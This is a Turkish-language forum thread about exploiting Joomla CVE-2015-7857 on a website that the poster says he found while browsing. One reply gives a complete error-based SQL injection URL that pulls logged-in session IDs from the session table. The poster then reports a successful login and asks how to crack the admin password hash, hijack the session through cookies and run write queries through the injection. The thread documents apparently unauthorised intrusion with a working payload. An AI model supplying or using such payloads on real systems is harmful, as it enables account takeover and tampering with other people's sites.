Joomla Admin Şifresi - Session

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    furkiak
    furkiak's avatar
    Kayıt Tarihi: 29/Nisan/2014
    Erkek

    merhebalar altaki sorudaki sorunu çözdüm ve siteye giriş yaptım fakat bir sıkıntım var :D 

    joomla tablolarının içindeki users tablosundan admin şifresini çekyiorum fakat {hash}:{salt}  şeklinde doğal olarak bunu kırmanın yolu varmıdır ? 

    bir de session tablosunu çekip içindeki bilgiyi cookie managerdan girerek admin girişi sağlamaya çalışıyorum yine olmuyor.

    sql le tüm tabloları görebiliyorum ama paneli giremiyorum bunu nasıl başarabilirz :D 

    ek bir soru: sql inj de update insert delete sorgularını gerçekleştirmenin bir yolu varmı ?

     

    eski konu başlığı: Joomla session hijacking CVE-2015-7857

    Merhabalar bir web sitesi üstünde öylesine bakınıyordum şu açığı gördüm ilk linki yazdım ve sonuç aldım ama videoda tam olarak 2. linkteki yazıyı tam  göremiyorum nette biraz araştırdım ama bir türlü cümlenin sonunu bulamadım bu konuda yardım edebilecek varmı ? 

    video link : https://www.youtube.com/watch?v=PBZsl2X3ZXo

     

    furkiak tarafından 06/Şub/17 16:09 tarihinde düzenlenmiştir

    Android Mobil Uygulama - Web Sitesi - Masaüstü Yazılım yapılır. Vitaminsiz Palyaço
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Martech
    Martech's avatar
    Kayıt Tarihi: 09/Mart/2007
    Erkek

    joomla hack olaylarından bir türlü kendini sıyıramadı gitti :) yıllardır böyleler

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    buzukatak
    buzukatak's avatar
    Kayıt Tarihi: 27/Haziran/2010
    Erkek

    Bu açık adı sanı belli o yüzden farklı dilden epey örnek bulunabilir. Ben onlara bakıp sadece açığın kontrolünü yapan, sesionId'yi ekrana basmayan örnekler olduğundan buraya sorduğunu varsayıyorum. Yok değilse ayıptır sabah sabah :/

    Tam görünmeyen kısım URL'nin son parametresindeki SQL sorgusunun bir kısmı. Bu kısımda girilenler videoda 02:04'de hata mesajında açıkça görünüyor. Sağlamasını aşağıda resimde göreceğin şekilde yaptım.

    Tam hali de bu:

    index.php?option=com_contenthistory&view=history&list[select]=(select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from i1q45_session where guest = 0 limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id

     

     

    buzukatak tarafından 06/Şub/17 05:41 tarihinde düzenlenmiştir

    anlıyorum.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    furkiak
    furkiak's avatar
    Kayıt Tarihi: 29/Nisan/2014
    Erkek
    buzukatak bunu yazdı

    Bu açık adı sanı belli o yüzden farklı dilden epey örnek bulunabilir. Ben onlara bakıp sadece açığın kontrolünü yapan, sesionId'yi ekrana basmayan örnekler olduğundan buraya sorduğunu varsayıyorum. Yok değilse ayıptır sabah sabah :/

    Tam görünmeyen kısım URL'nin son parametresindeki SQL sorgusunun bir kısmı. Bu kısımda girilenler videoda 02:04'de hata mesajında açıkça görünüyor. Sağlamasını aşağıda resimde göreceğin şekilde yaptım.

    Tam hali de bu:

    index.php?option=com_contenthistory&view=history&list[select]=(select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from i1q45_session where guest = 0 limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id 

    hocam saolasın giriş başarılı şekilde yapıldı :)


    Android Mobil Uygulama - Web Sitesi - Masaüstü Yazılım yapılır. Vitaminsiz Palyaço
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    furkiak
    furkiak's avatar
    Kayıt Tarihi: 29/Nisan/2014
    Erkek

    soruyu değiştirdim konu fazlalığı olmasın diyerek up olsun


    Android Mobil Uygulama - Web Sitesi - Masaüstü Yazılım yapılır. Vitaminsiz Palyaço
Toplam Hit: 2565 Toplam Mesaj: 5
joomla